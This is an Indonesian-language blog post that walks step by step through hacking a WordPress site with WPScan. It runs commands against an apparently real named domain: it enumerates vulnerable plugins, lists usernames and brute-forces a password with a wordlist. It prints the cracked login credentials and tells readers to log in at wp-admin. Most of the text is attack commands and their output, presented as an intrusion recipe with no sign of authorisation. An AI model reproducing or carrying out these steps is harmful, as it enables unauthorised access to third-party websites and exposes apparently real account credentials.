403 Forbidden

Jumat, 18 Januari 2013

Enumerate/Hack wordpress site dengan wpsan.rb

Download WPScan

kata developernya,,tools ini gak support di Windows OS gan, tpi coba agan baca README nya siapa tw aja ada solusi klo di Windows

gak usah kebanyakan bacot gan.
tutor ini ane tujukan kpd Backtrackers dan Linux user

1. buka wpscan.rb (/pentest/web/wpscan )
2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y.
klo agan milih y,trus udah selesai updatenya,,biasanya muncul error kya gini pas buka wpscan.rb

root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri>
solusinya udah ada di error messagenya gan, tinggal ketik ini :

gem install --user-install nokogiri
3. Klo udah cobe ketik ./wpscan.rb atau /wpscan.rb --help ntar munucl tuh option2nya

4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln :

./wpscan.rb --url www.productbestbuy.com --enumerate p!
tinggal tunggu, ntar muncul plugin2 yg vuln

[+] We found 1 plugins:

 | Name: jetpack
 | Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
 | Directory listing enabled? Yes.
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/

[+] Finished at Sun Dec 30 21:56:44 2012
tuh gan,,malah dikasih exploitnya juga
5. skarang coba ane cari username nya :

./wpscan.rb --url www.productbestbuy.com --enumerate u
dan tinggal tunggu aja,,ntar keluar tuh username2 yg ada di databasenya
[+] Enumerating usernames ...

We found the following 2 username/s :

  admin
  developer
6. skarang nyari password nya pke brute force, di tools ini kita cuma bisa pke teknik brute force untuk nyari passnya gan,,jdi inet hrus cepet dan hrus punya modal keberuntungan. dan yg pling penting harus sediain wordlist.lst bejibun gan. Wordlist ane letaknya di /root/Desktop/wordlist.lst


./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
dan hasilnya :

[+] Starting the password brute forcer

  Brute forcing user 'developer' with 12 passwords... 58% complete.
  [SUCCESS] Username : developer Password : cisadane123456


[+] Finished at Sun Dec 30 22:38:18 2012
wkwkw,,beruntung banget ane, pass langsung tembus

nemu tuh gan,,

Username : developer Password : cisadane123456[/code]

tinggal login aja gan.,site wp secara default loginnya ada di folder http://siteswp.com/wp-admin/
untuk download wordlist nya,,bisa lihat di sini gan

PIC:














penulis : RieqyNS13
wpscan developer : ethicalhacke3r

2 comments


EmoticonEmoticon